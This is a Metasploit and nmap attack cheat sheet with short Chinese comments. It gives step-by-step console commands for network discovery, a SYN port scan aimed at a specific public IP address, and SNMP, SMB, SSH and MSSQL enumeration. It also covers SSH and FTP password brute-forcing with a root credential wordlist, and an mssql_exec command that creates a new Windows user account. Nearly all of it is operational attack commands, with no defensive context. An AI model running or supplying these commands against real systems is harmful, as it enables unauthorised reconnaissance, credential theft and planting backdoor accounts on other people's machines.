db_nmap -sV 192.168.1.0/24
192.168.1.20-192.168.1.30 、 192.168.1.0/24,192.168.11.0/24(扫描两个网段)
file:/root/host.txt (将需要扫描的主机访问文本中)
use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > set interface eth0
msf6 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.0.0/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set threads 20
msf6 auxiliary(scanner/discovery/arp_sweep) > run
use auxiliary/scanner/portscan/syn
msf6 auxiliary(scanner/portscan/syn) > set rhosts 114.115.165.18
msf6 auxiliary(scanner/portscan/syn) > set threads 50
run
use auxiliary/scanner/ip/ipidseq
msf6 auxiliary(scanner/ip/ipidseq) > set rhosts 192.168.0.0/24
msf6 auxiliary(scanner/ip/ipidseq) > run
nmap -PN -sl 1.1.1.2 1.1.1.3
use auxiliary/scanner/discovery/udp_sweep
use auxiliary/scanner/discovery/udp_probe
use auxiliary/sniffer/psnuffle
vi /etc/default/snmpd #在测试机侦听地址修改为0.0.0.0
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_enumusers
use auxiliary/scanner/snmp/snmp_enumshares
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/pipe_auditor
use auxiliary/scanner/smb/pipe_dcerpc_auditor
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_lookupsid
use auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/ssh/ssh_login
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
use auxiliary/scanner/ssh/ssh_login_pubkey
use post/windows/gather/enum_patches
#这个要通过已经获得session去利用
use auxiliary/scanner/mssql/mssql_ping
use auxiliary/scanner/mssql/mssql_login
use auxiliary/admin/mssql/mssql_exec
set CMD.NET user user pass /ADD
use auxiliary/scanner/ftp/ftp_version
#查看是否可以匿名登录
use auxiliary/scanner/ftp/anonymous
#密码破解
use auxiliary/scanner/ftp/ftp_login